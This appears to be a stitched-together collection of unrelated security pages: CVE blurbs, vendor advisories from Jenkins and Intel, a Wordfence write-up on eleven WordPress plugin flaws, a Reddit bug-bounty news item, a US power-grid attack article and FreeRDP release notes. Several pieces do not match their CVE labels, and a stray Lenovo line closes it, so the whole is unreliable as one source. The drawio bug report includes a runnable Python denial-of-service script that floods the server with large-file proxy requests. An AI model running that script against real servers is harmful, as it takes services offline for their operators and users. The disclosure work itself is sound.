An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device.

CVE-2022-26966

PingCentral versions prior to listed versions expose Spring Boot actuator endpoints that with administrative authentication return large amounts of sensitive environmental and application information.

PingCentral 1.10.1

PingCentral is a new product from Ping Identity that provides self-service delegated administration. Ultimately, it streamlines the rollout of the Ping Intelligent Identity™ platform and accelerates your digital transformation.

Download & Install

Click on the button to start your download.

1.10.1

ASC SHA256

  
What's new in this release? See Release Notes

Need a license key? Contact us.

Looking for cloud deployment? Check out our DevOps resources.

Looking for an older release? Check previous releases.  

Start Today

See how Ping can help you deliver secure employee and customer experiences in a rapidly evolving digital world.

Contact Sales

sales@pingidentity.com

+1 877-898-2905

Request a free demo

CVE-2022-23726: Download PingCentral | Ping Identity

Jenkins AppSpider Plugin 1.0.15 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL and send an HTTP POST request with a JSON payload consisting of attacker-specified credentials.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

AppSpider Plugin 1.0.16 requires POST requests and Overall/Administer permission for the affected form validation method.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-32998

**Jenkins AppSpider Plugin Cross-Site Request Forgery vulnerability**

Moderate severity GitHub Reviewed Published May 16, 2023 to the GitHub Advisory Database • Updated May 17, 2023

**Package**

maven com.rapid7:jenkinsci-appspider-plugin (Maven)

**Affected versions**

<= 1.0.15

Jenkins AppSpider Plugin 1.0.15 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL and send an HTTP POST request with a JSON payload consisting of attacker-specified credentials.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

AppSpider Plugin 1.0.16 requires POST requests and Overall/Administer permission for the affected form validation method.

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-32998
*   https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3121

Published to the GitHub Advisory Database

May 16, 2023

Last updated

May 17, 2023

GHSA-vgfw-766v-7q82: Jenkins AppSpider Plugin Cross-Site Request Forgery vulnerability

A race condition in specific microprocessors using Intel (R) DDIO cache allocation and RDMA may allow an authenticated user to potentially enable partial information disclosure via adjacent access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Partial Information Disclosure Advisory**

**Summary: **

A potential security vulnerability in some microprocessors with Intel® Data Direct I/O Technology (Intel® DDIO) and Remote Direct Memory Access (RDMA) may allow partial information disclosure via adjacent access.

**Vulnerability Details:**

CVEID: CVE-2019-11184

Description: A race condition in specific microprocessors using Intel (R) DDIO cache allocation and RDMA may allow an authenticated user to potentially enable partial information disclosure via adjacent access.

CVSS Base Score:  2.6 Low

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N

**Affected Products:**

Intel® Xeon® E5, E7 and SP families that support DDIO and RDMA.

**Recommendations:**

Partial information potentially disclosed through exploitation of this vulnerability could be utilized to enhance unrelated attack methods.  For published exploits that Intel is aware of, Intel recommends users follow existing best practices including:

Where DDIO & RDMA are enabled, limit direct access from untrusted networks.

The use of software modules resistant to timing attacks, using constant-time style code.

Security Best Practices For Side Channel Resistance:

https://software.intel.com/security-software-guidance/insights/security-best-practices-side-channel-resistance

Guidelines For Mitigating Timing Side Channels Against Cryptographic Implementations:

https://software.intel.com/security-software-guidance/insights/guidelines-mitigating-timing-side-channels-against-cryptographic-implementations

**Acknowledgements:**

Intel would like to thank Michael Kurth, Ben Gras, Dennis Andriesse, Cristiano Giuffrida, Herbert Bos, and Kaveh Razavi from VU Amsterdam for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

09/10/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11184: INTEL-SA-00290

The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_activate_required_theme' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to activate the 'royal-elementor-kit' theme. If no such theme is installed doing so can also impact site availability as the site attempts to load a nonexistent theme.

On December 23, 2022, the Wordfence Threat Intelligence team initiated the responsible disclosure process for a set of 11 vulnerabilities in Royal Elementor Addons, a WordPress plugin with over 100,000 installations. The plugin developers responded on December 26, and we sent over the full disclosure that day.

We released a firewall rule protecting against these vulnerabilities to Wordfence Premium, Care, and Response customers on December 23, 2022. Sites still running the free version of Wordfence will receive the same protection 30 days later, on January 22, 2023.

While none of the vulnerabilities were critical, several of them could have been used by any authenticated user to modify content, disable plugins, or even temporarily take down the site in some circumstances. Additionally one of the patched vulnerabilities was a Reflected Cross-Site Scripting vulnerability which could have been used to take over the site if an attacker was able to trick an administrator into performing an action, such as clicking a link.

**Vulnerability Details**

The primary set of issues we found with Royal Elementor Addons was due to a lack of access control and nonce checks on various AJAX actions in the plugin.

Royal Elementor Addons has an option to quickly activate the recommended Royal Elementor Kit theme. Unfortunately, this is performed via an AJAX function, wpr_activate_required_theme, which did not perform capability or nonce checks, or even check if the theme was installed on the site. This meant that any logged-in user, such as a subscriber, could change a vulnerable site’s theme. If the Royal Elementor Kit theme was not installed on the site, this would result in a loss of availability as the site would fail to load and instead display an error message.

Royal Elementor Addons has an option to revert the site to a “compatible” state for imported templates via the wpr_fix_royal_compatibility AJAX function. This involves deactivating all but a short list of hard-coded plugins. As the function did not use capability or nonce checks, this means that any authenticated user could deactivate plugins necessary for site functionality as well as any security plugins that do not specifically block this action. This could cause the site to become unavailable or vulnerable to additional exploits.

Royal Elementor Addons allows importing preset templates via the wpr_import_templates_kit AJAX function. Vulnerable versions of the plugin do not include capability or nonce check for this function, so any authenticated user could import templates, potentially overwriting any existing templates.

Royal Elementor Addons has an option to activate the ‘contact-form-7’, ‘media-library-assistant’, or ‘woocommerce’ plugins if they are installed on the site via the wpr_activate_required_plugins AJAX action, and this functionality was available to any logged-in user. Fortunately the impact of this vulnerability is quite minimal as it would only allow an attacker to activate three select plugins.

Royal Elementor Addons has an AJAX action, wpr_reset_previous_import, used to delete previously imported content when importing new content. However, since it is accessible to any authenticated user, this could be used to delete imported content without importing new content, potentially resulting in site availability issues.

Royal Elementor Addons uses the wpr_final_settings_setup AJAX action to finalize activation of preset site configuration templates, which can be chosen and imported via a separate action. As with the other vulnerabilities recorded here, any authenticated user could access this functionality, though the impact of this vulnerability was lower.

Royal Elementor Addons uses the wpr_save_mega_menu_settings AJAX action to update mega menu settings. As with the other vulnerabilities we found, this action called a function that did not include a capability check or a nonce check, so any authenticated user could update menu settings.

Royal Elementor Addons uses the wpr_save_template_conditions AJAX action to save template conditions, determining when a given template will be displayed and used. The action called a function that was accessible to any authenticated user.

Royal Elementor Addons uses the wpr_import_library_template AJAX action to import and activate templates from the plugin developers’ template library. As with other vulnerabilities reported here, the action called a function that did not include a capability or nonce check, allowing any authenticated user to access it.

The final vulnerabilities we found did not exactly fit the pattern of the others – one was a lower-severity Cross-Site Request Forgery(CSRF) and the other, a higher-severity reflected Cross-Site Scripting(XSS).

Unlike the other AJAX actions we’ve mentioned so far, wpr_create_mega_menu_template, which is used to create new menu templates, did include access control. It was, however, still lacking a nonce check, so an attacker could trick a logged-in administrator into performing an action that would result in a menu template being created.

**Description**: Reflected Cross-Site Scripting  
**Affected Plugin**: Royal Elementor Addons  
**Plugin Slug**: royal-elementor-addons  
**Affected Versions**: <= 1.3.59  
**CVE ID**: CVE-2022-4710  
**CVSS Score**: 6.1 (Medium)  
**CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
**Researcher/s**: Ramuel Gall  
**Fully Patched Version**: 1.3.60

Unlike all of the other vulnerabilities mentioned above, reflected cross-site scripting(XSS) can be used by an attacker to completely take over a website if they can trick a logged-in administrator into performing an action, such as clicking a link, by performing actions as that administrator, such as adding a new malicious administrator, or inserting a backdoor into a plugin or theme file.

Additionally, unauthenticated users could also be targeted by this to redirect them to a malicious website or perform actions in their browsers. In this case, the data_fetch function failed to escape the wpr_ajax_search_link_target parameter used to return search results. Note that _all_ Wordfence users, including Wordfence free users, are protected against exploits targeting this rule by the Wordfence firewall’s built-in Cross-Site Scripting protection.

**Timeline**

**December 23, 2022** – We release a firewall rule protecting Wordfence Premium, Care, and Response customers and reach out to the plugin developer  
**December 26, 2023** – The plugin developer responds  
**December 29, 2023** – A patched version, 1.3.60, is released  
**January 22, 2023** – Firewall rule becomes available to Wordfence Free users 

**Conclusion**

In today’s article, we covered a set of 11 vulnerabilities in the Royal Elementor Addons plugin. While none are critical, several can have severe consequences under certain circumstances.

The Wordfence firewall protects Wordfence Premium, Care, and Response users from these vulnerabilities and Wordfence Free users will receive protection on January 22, 2023 Nonetheless, we strongly recommend updating to the latest version of the plugin, which is 1.3.60 at the time of this writing, as soon as possible.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Royal Elementor Addons as soon as possible.

_If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard._

CVE-2022-4700: Eleven Vulnerabilities Patched in Royal Elementor Addons

Bug fixed within 24 hours and $5,000 bug bounty awarded

Bug fixed within 24 hours and $5,000 bug bounty awarded

A vulnerability in Reddit allowed attackers to perform moderator actions or elevate regular users to mod status without the appropriate permissions.

The flaw could have allowed for all kinds of mischief, as Reddit mods are privileged to perform actions such as pin or remove posts, ban other users, and edit subreddit information.

Read more of the latest hacking news

As detailed in a recent HackerOne report, a bug hunter with the handle ‘high\_ping\_ninja’ found that Reddit failed to check if the user was a moderator of a particular subreddit when they attempted to access the mod logs via GraphQL.

“You can change the parameter to any target subreddit name which is public or restricted and get access to mod logs of that subreddit,” they explained.

**Same-day fix**

The insecure direct object reference (IDOR) bug was reported on August 3 and fixed on the same day.

“I increased severity to high based on our program policy,” a member of the Reddit triage team said in the disclosure notes.

The researcher was awarded a $5,000 bug bounty for the find.

**DON’T MISS** Pwn stars: The best Black Hat and DEF CON talks of all time

Simple IDOR vulnerability in Reddit allowed mischief-makers to perform mod actions

Denial of Service in GitHub repository jgraph/drawio prior to 18.1.3.

**Description**

consider following script

**exploit.py**

put drawio\_docker\_instace your address and also big\_file\_address should be serve a big image file ( > 250 MB)

    from multiprocessing import Process
    import requests
    
    def fun():
        try:
           requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
           #requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
           print("OK")
        except:
            print("error from server")
    
    def main():
        for i in range(1,40):
            p = Process(target=fun, args=())
            p.start()
    
    if __name__ == '__main__':
        main()
    

I upload forty 250MB photos at the same time, and the server hangs up ( I test it on upcloud basic server plan) both /proxy and /embed2.js was vulnerable to DOS and /embed2.js was more vulnerable as I saw in docker status you can check it yourself with my POC.py file

**Proof of Concept**

The POC is for the /embed2.js endpoint and for the /proxy endpoint we should increase the number of simultaneously Processes https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing

**Impact**

High damage on Availability of server, In my tests the docker instance was stopped working. because the drawio ran on the same docker of the mentioned methods, then the whole application can be damaged by this attack. So I prefer set the availability of CVSS to high

CVE-2023-3398: proxying Big files leads to potential DOS in drawio

A major cyberattack on the US electrical grid has long worried security experts. Such an attack wouldn’t be easy. But if an adversary pulled it off, it’d be lights out in more ways than one.

When the lights went out across the Iberian Peninsula in April, everything ground to a halt. Scores of people were trapped in Madrid’s underground metro system. Hospitals in Lisbon had to switch to emergency generators. Internet service as far away as Greenland and Morocco went down.

While the cause remains unclear, the actual damage to the Iberian power grid—and the people it serves—was relatively minor. Less than 24 hours after the outage began, the region’s electricity operators managed to get the grid back online.

Even if things could have been much worse, the outage was both an unnerving reminder of how suddenly things can go offline.

For years, cybersecurity professionals, watchdogs, and government agencies have warned that a malicious cyberattack on the US power grid could be devastating. With ample evidence that state-sponsored hacking groups are eyeing the decentralized and deeply vulnerable power grid, the risk is more acute than ever.

Case in point: Hackers, believed to be linked to the Chinese government, spent years exploiting vulnerabilities in critical infrastructure across the mainland United States and Guam to obtain access to their systems. The operations, dubbed Volt Typhoon, could have used this access to shut down or disconnect parts of the American power grid—throwing millions into the dark. The effort was, luckily, disrupted and the vulnerabilities patched. Still, it is an unnerving illustration of just how vulnerable the electric system truly is.

We know what such a hack could look like. In 2015, Ukraine experienced the world’s first large-scale cyberattack on an electrical grid. A Russian military intelligence unit known as Sandworm disconnected various substations from the central grid and knocked hundreds of thousands of people offline.

The attack on Ukraine was repaired quickly, but cybersecurity experts have been warning for years that the next one might be more devastating.

Unlike Ukraine, America does not have a single power grid—it has three large interconnections, broken down into a network of smaller regional systems, some of which stretch into Canada. Most of the East is on one grid, most of the West is on another, while Texas and Alaska run their own interconnections. Keeping these networks running is a wildly complicated effort: There are thousands of utility operations, tens of thousands of substations, and hundreds of thousands of miles of high-voltage transmission lines.

Photograph: Michael Tessier

To some degree, this decentralized network is an asset, as it means there is no core vulnerability that risks knocking the entire country offline. But the interconnections mean that a failure in one corner of the grid could cause a cascade that takes down the entire system.

In 2018, researchers from Northwestern University ran large-scale models, gaming out what would happen if parts of the grid failed. They found that, generally, the American power grid was resilient. However, they found that about 10 percent of power lines in the US were susceptible to the kind of failure that could trigger this domino effect under some conditions. A 2022 study that looked at possible disruptions to the Texas grid also found that, in some cases, a relatively small disruption could cause a series of downstream outages “rapidly in succession.”

This means that even if malicious actors manage to take only a small number of nodes in the network offline, it has the potential to do enormous downstream damage.

Insurance underwriter Lloyd’s of London has looked at the effects of such an outage. In this hypothetical, first drafted in 2015 but updated in the years since, Lloyd’s estimates that a Trojan virus that manages to infect just 50 generators—removing 10 percent of the grid’s total power—can trigger this cascade effect and knock out power for most of the East Coast, including New York City and Washington, DC. The Lloyd’s report states that this is an “extreme” but “not unrealistic scenario.”

“Images of a dark New York City make front pages worldwide,” they write, “accompanied by photographs of citizens stuck underground for hours on stranded subway cars and in elevators in the summer heat.”

These rolling blackouts would stretch through 36 states over the course of a day, throwing some 93 million people into the dark. It could take up to three days for half of those people to get back online—while hardware damage and other problems could require up to three weeks to fix.

As the outages continue, more difficulties arise. The analysts warn that an information campaign running parallel to the cyberattack could prompt strikes, protests, or general unrest.

In 2016, then Federal Emergency Management Agency administrator Craig Fugate was summoned to Congress to testify on the possible impacts of a cyberattack on the US electric grid. Water and wastewater systems are some of the first things to go down, he noted. “There is not really a good way to manage that if those systems go offline for extensive periods of time,” Fugate said.

He explained that the emergency response will become a game of triage: distributing enough power, gas, and generators to emergency services and utilities, while also trying to keep consumer-facing supply chains operating.

“Can you get enough life support and infrastructure going to keep the major supply lines up?” Fugate continued. “You are not going to have everything. You are not going to have what the normal consumption rates are.”

Lloyd’s estimates that the total economic costs and losses could hit $1 trillion.

The US Grid Attack Looming on the Horizon

FreeRDP is a free remote desktop protocol library and clients. All FreeRDP based clients when using the `/video` command line switch might read uninitialized data, decode it as audio/video and display the result. FreeRDP based server implementations are not affected. This issue has been patched in version 2.8.1. If you cannot upgrade do not use the `/video` switch.

Notewhorth changes:

*   Fixed CVE-2022-39282
*   Fixed CVE-2022-39283
*   Added missing commit for backported #8041: Remove ALAW/ULAW codecs from linux backends (unreliable)
*   Added hash checks for android build script dependencies

Fixed issues:

*   #8190: Fix build break with newer FFMPEG versions
*   #8234: Updated flatpak with build script
*   #8210: Better execinfo support check for android
*   #7708: Header now defines DumpThreadHandles
*   #8176: Check fullscreen state and not setting
*   #8236: Send resize on window state change
*   #7611: Audin macOS monterey fix
*   #8291: Android build script update
*   Fix length checks and initialization in the deprecated (disabled per default) tsmf channel

Search

lenovo warranty check/lookup | check warranty status | lenovo support us